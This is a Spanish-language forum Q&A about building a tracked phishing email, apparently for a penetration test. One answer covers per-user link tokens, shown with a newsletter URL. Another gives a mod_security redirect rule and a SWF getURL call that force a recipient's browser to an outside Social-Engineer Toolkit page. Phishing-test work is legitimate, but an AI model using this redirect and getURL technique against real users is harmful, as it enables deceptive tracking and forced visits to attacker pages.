Estoy tratando de crear un correo electrónico de phishing para un proyecto en el que estoy. En el correo electrónico quiero enlazar a un sitio que recopilará IP, navegador, fecha / hora de cuando se visitó. nada malicioso, solo para probar que los usuarios hicieron clic en el enlace. ¿Puedo hacer esto en el kit de herramientas de ingeniería social o no es posible?
El método más simple es colocar un token personalizado por el usuario en cada copia del correo electrónico de phishing. Por ejemplo, un correo de Groupon en mi bandeja de entrada tiene el siguiente enlace: he insertado un montón de nuevas líneas entre los campos individuales de la cadena codificada en URL. Puede ver que hay un campo de "usuario" con una cadena hexadecimal de 64 bytes: ese es el identificador único que le dice a Groupon que soy yo cuando hago clic en su correo electrónico para ver el acuerdo en su sitio web.
http://www.groupon.com/deals/jimmy-s-famous-pizza-and-golfland-usa?
p=1
&utm_source=newsletter
&utm_medium=email
&sid=3cc714b9-fd5b-4d66-bead-e7c2e20d21bd
&division=boston
&user=03c1384e250d6c131d9b8948b6c5d536d26d9b0beb33f1fa5b6191e323b87c63
&date=20130522
Entonces, cuando hago clic para ir a su sitio, saben que estoy allí porque enviaron un boletín a (alguien) por correo electrónico el 22 de mayo. Asumen que (alguien) soy yo, debido a esa cadena de usuario; por supuesto, si reenvío el correo electrónico a mis amigos y ellos hacen clic, entonces el sitio web obtendrá esa cadena de usuario de ellos ... así que esto es solo una conexión suelta. Sin embargo, si estás phishing, es realmente lo más cerca que estarás sin hacer que hagan más que solo hacer clic en un enlace.
gowenfawr dio una respuesta concisa, sin embargo, iré un paso más allá. Dependiendo de qué cliente de correo electrónico tenga el usuario, podría obligarlos a visitar un sitio como este o no. Implica incrustar un JPG o GIF, un servidor y mod_security.
En la instancia descrita anteriormente, puede incrustar decir " logo.jpg " en su firma. Si el usuario tiene un correo electrónico que permite mostrar contenido remoto (html en el correo electrónico), puede indicar a mod_security: "hey, cada vez que alguien solicite logo.jpg, deles logo.swf " donde logo .swf realiza un comando getURL para abrir un navegador.
SecFilterSelective REQUEST_URI "/logo.jpg" redirect:http://loaded-web-site.com/logo.swf
Dentro del archivo swf puedes poner lo que quieras:
getURL("social-engineering-toolkit-page.html", "_blank", "GET");
Todo depende de cuánto tiempo quiera gastar, cuánto esfuerzo ponga, etc.
Lea otras preguntas en las etiquetas penetration-test phishing social-engineering